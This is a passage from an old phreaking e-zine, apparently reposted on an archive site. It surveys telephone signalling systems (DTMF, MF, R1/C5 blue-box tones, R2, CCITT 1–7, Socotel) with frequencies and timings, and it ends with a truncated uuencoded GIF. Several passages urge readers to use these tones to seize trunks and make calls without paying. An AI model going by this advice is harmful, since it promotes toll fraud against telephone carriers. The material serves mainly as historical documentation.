systems in use are: C5, C6, C7, and R2. R2 is limited to a single
numbering region by policy and must use one of the three
remaining systems for overseas working. There are few technical
limitations to prevent R2 from working with satellites, TASI, or
other analog/digital underseas cables. The spec is flexible
enough to allow overseas working, but is not done at the present
time. R2 is likely to displace C5 on the remaining analog trunks
in the near future.

DTMF is on a 4x4 matrix, one tone from a row and one from a
column. 1=697+1209, etc.

1209 1336 1477 1633
697 1 2 3 A
770 4 5 6 B
852 7 8 9 C
941 * 0 # D


MF signalling, often used to signal between pionts, uses a 2 of 6
matrix. Each tone has a weighting which adds up to an unique
number. The three standard sets of tones use this system.

Digit Weighting
1 0+1
2 0+2
3 1+2
4 0+4
5 1+4
6 2+4
7 0+7
8 1+7
9 2+7
0 (Code 10) 4+7
11 (Code 11) 0+12
12 (Code 12) 1+12
KP1 (Code 13) 2+12
KP2 (Code 14) 3+12
ST (Code 15) 7+12

For C5, either KP is 100mS and each digit lasts 50mS. A 50mS off
time is used between each digit. For older R1 systems, the KP is
100mS and each digit is 68mS on and 68mS off. Modern systems are
C5 compatible and use the C5 timing. In North America,

  
an
additional 50 or 68mS pause is inserted before the last digit.

Example: KP18(pause)2ST.....KP03120600148(pause)0ST. This pattern
was added about 15 years ago and appears to be unnecessary,
except to give an audible indication of false (blue box)
signalling. Its is is HIGHLY recommended for phreaks where it is
normally used by the telco! R2 is a COMPELLED system where
reception of the forward signal produces a backward signal, which
at its reception, stops the forward signal. The stopping of the
forward signal stops the backward signal, and when the stopping
of the backward signal is detected, a new forward signal is
generated. This goes back and forth until all the information is
transmitted. The backward signal (usually "1", send next digit)
tells the sendig end what to send next. See the CCITT Red Book or
Welch for complete information on both systems.

Weight MFC R2 forward R2 Backward
0 700 1380 1140
1 900 1500 1020
2 1100 1620 900
4 1300 1740 780
7 1500 1860 660
12 1700 1980 540

C4 is the old European signalling system. The address signals
have 35mS pause between each beep and 100mS pause (minimum)
between each digit. Minimum time to send a digit (including
pause) is 345mS. This system is limited use today, if at all.

x: 2040 35mS (binary "1")
y: 2400 35mS (binary "0")
X: 2040 100mS
Y: 2400 100mS
XX: 2040 350mS
YY: 2400 350mS
P: 2040+2400 150mS

Clear Forward: PXX
Transit Seizure: PX
Forward Transfer: PYY
Terminal Seizure: PY
1: yyyx
2: yyxy
3: yyxx
...
14: xxxy
15: xxxx
16: yyyy


Place Event Freq Cadance
================================================================
N. America dialtone 350+440
Continuous ring 440+480 2s on 4s off
busy 480+620 0.5s on 0.5s off
fast busy 480+620 0.25 on 0.25 off

England ring 450+500 0.25 on 0.5 off
(Australia,New Zealand, etc.) 0.25 on 2.0 off

Japan ring 450+500 1.0 on 2.0 off

Holland dialtone 150+450 Continuous (450
at -8dB)

Most of world all 400 or 440 (See text)
SIT 950, 1400, 1800 (See text)


Most of the world's phone systems use only one low pitched
tone to represent all calling status. The most common tones in
use are 400Hz, 440Hz and 450Hz. In some cases the tones are
modulated, usually AM, at 25 or 50Hz at variable depths. In some
old switches, the ring modulates the tone, or it is just the
harmonics of the ring frequency, which is usually 25Hz, but can
be other frequencies, producing the "fart ring". Cadances for
the busy are either the fast at 0.25 on and 0.25 off, or the slow
at 0.5 on and 0.5 off. Ring signals are usually on one second and
off for two, but can vary. In Iraq, the ring is continuous! The
SIT (Subscriber Information Tone) is 950 then 1400 and then
1800Hz. The total length is about one second. The lengths of the
individual tones are sometimes variable to impart different
meanings for automatic detection.


National Signalling Systems
---------------------------

CCITT 1, 2 and 3 are early international standards for
signalling the distant end. C1 is just a 500Hz line signalling
tone, and was used to alert the operator at a distant switchboard
that there was traffic and no DC path, due to amplifiers or
repeaters on a relatively long circuit. C1 has only one line
signalling function (forward transfer) and no address signalling.
It is probably used nowhere.

CCITT 2 was the first international standard that used
address signalling, allowing automatic completion of calls. Two
frequencies, 600Hz and 750Hz, were used for line signalling and
by pulsing between the two frequencies, representing make and
break, of the loop current at the distant end during signalling,
calls were automatically pulse dialable. You may actually find
this system in limited use in very remote parts of Australia or
South Africa. Fairly high signalling levels are required and may
very well make customer signalling impossible, unless you are
right there. Travel to both the above countries should be
fascinating however for both phone play and cultural experience!

CCITT 3 is an improved pulse system. Onhook is represented
by the presence of 2280Hz and offhook by the absence of 2280Hz.
This exact system is still used in a surprising number of places.
Pulse-dial PBX's often use C3 to signal distant branches of a
company over leased lines. Signalling for this system is
generally at a much lower level than C2: The tones will propagate
over any phone line.

A system from the early 50's is called R1. Many people
remember R1 as the Blue boxes of the 60's and 70's . R1 is still
in wide use in the United States, Canada and Japan. The use of
2600Hz for line signalling is quite rare in the 90's, but can be
found in all of the above countries. Address signal-ling uses the
MFC standard which is a combination of two of six tones between
700Hz and 1700Hz as in CCITT 5. Alsmost all R1 used either "out
of band" signalling at 3825Hz or 3350Hz or some form of digital
or DC line signalling. To use this system from home one must find
an indirect method of using the "out of band" signalling. In
North America, most signalling from your central office to your
long distance carrier is R1, as is most OSPS/ TSPS/TOPS operator
traffic.

Pulse systems like CCITT 2 and 3 are still used in national
systems. In North America, the C3 standard using 2600Hz in place
of 2280 for national working was commonplace through the 70's and
still has limited end-to-end use today. "End-to-end" use refers
to sending just the last few digits (usually five) to complete
the call at the distant end. The only use this may have to the
phreak would be to make several calls to a single locality on one
quarter. It may be possible that a certain code would drop you
into an R1, but you just have to experiment! This type of system
is referred to as 1VF, meaning "one Voice Frequency". The other
standard frequency, for use outside North America, is 2400Hz. A
national system using two voice frequencies (2VF) may still be
used in remote areas of Sweden and Norway. The two frequencies
are 2400Hz and 2600Hz. Playing these two systems in Europe
predates the cracking of the R1 and C5 systems in the late 50's
and early 60's respectively. The first phone phreak was probably
in Sweden.

Common Channel Interoffice Signalling (CCIS) is CCITT 6
developed for national use and employing features that are of
interest to national admini-strations. R1 often plays into a
gateway being converted to CCIS and CCIS will play into a gateway
that converts to C5, C6 or C7 for international working. The
bulk of the ATT net is CCIS in North America, while R1 is often
used by your CO talk to it and the lessel networks. CCITT 7 is
the digital system and is the same nationally as internationally.
C7 allows the greatest efficiency of all systems and will in time
be the world system. C7 has much more speed and versatility than
R2, but is a digital only system. All fiber optic systems employ
SS7 (C7).

No discussion of systems is complete without mentioning
Socotel. Socotel is a general system developed by the French. It
is a hodgepodge of many systems, using MFC, pulse tone, pulse AC
and pulse DC system. Most (all?) line signalling tones can be
used. An inband system can use 2500Hz as a clear forward and 1700
or 1900Hz for seize or, in Socotel terms, "confirm". Most line
signalling today is "out of band", but unlike normal outband
signalling, it is below band: DC, 50Hz or 100Hz. It is a "brute
force" system using 100V levels, insuring no customer has a
chance of getting it directly! Call setup on the AC systems often
has a very characteristic sound of of short bursts of 50Hz or
100Hz buzz, followed by the characteristic French series of 500
Hz beeps to alert the customer that the call has been received
from the Socotel by the end office and is now being (pulse)
dialed. Calls often don't make it through all the gateways of a
Socotel system, sometimes giving the French phreak a surprise
access where it stuck!

On a national level there are even more systems and some are
very bizarre. Some use backward R2 tones in the forward direction
for line signalling, giving analog lines the versatility of
digital line signalling. There have been some interlocal trunks
that actually used DTMF in place of MF! The "Silicon Valley" was
once served by DTMF trunks for instance. When I visited my local
toll office and was told this and pressed for an answer as to
why, I was told "We had extra (expensive then) DTMF receivers and
used them!" As a phreak, be ready for anything as you travel the
world.


Stuff to read
-------------

Signalling in Telecommunications Networks, S. Welch, 1979 ISBN 0
906048 044
The Institution of Electrical Engineers, Londen & New York

CCITT Red Book, Blue Book, Green Book and whatever other colors
of books they have, Concentrate on the Q norms.
Telecommunications Engineering, Roger L. Freeman


== Join the Digital City, telnet dds.hacktic.nl, login 'gast' ==



-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

[Atreid- J'ai d‚cid‚ de mettre ‡a … la fin au lieu des News,
comme ‡a personne se plaindra qu'il fallait faire Page/Down
pendant une demie-heure... Autrement dit, tout le reste de NPC
est du uuencod‚...]


Hackers For Bob (GIF)

Le gif d'une g‚n‚ration
(fouille-mo‚ pourquoi!)

par Gurney Halleck


OK, gang, voici Hackers for Bob, un GIF qui fait halluciner
tous les potes du HP chez nos voisins du sud. Ne me demandez pas
ce qu'il a de sp‚cial, je n'en ai foutrement aucune id‚e. 2600
l'a publi‚ lors de son dernier num‚ro, et depuis, tout le monde
se l'‚change sur Internet. Alors, pour que vous ne soyiez pas en
reste, j'ai pens‚ … vous! Le tout est uencod‚, of course...


begin 644 HACK4BOB.GIF
M1TE&.#=AF`%T`?<```````$!`0("`@,#`P0$!`4%!08&!@<'!P@("`D)"0H*
M"@L+"PP,#`T-#0X.#@\/#Q`0$!$1$1(2$A,3$Q04%!45%186%A<7%Q@8&!D9
M&1H:&AL;&QP<'!T='1X>'A\?'R`@("$A(2(B(B,C(R0D)"4E)28F)B<G)R@H

...


MYA"J%!&'@P=9$T0JT9.1X4D]S*2$<4H4T]E+Q7221@^B["9)#DY$T4K!BR[N
M2[]%=5UD46&H<+TNF<S9S"7I(R%+"U+DX,1'270S/OUP?A&$%OEC?S__],-D
+D_EB]7%"]0@(`#LN
`
end
--

-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT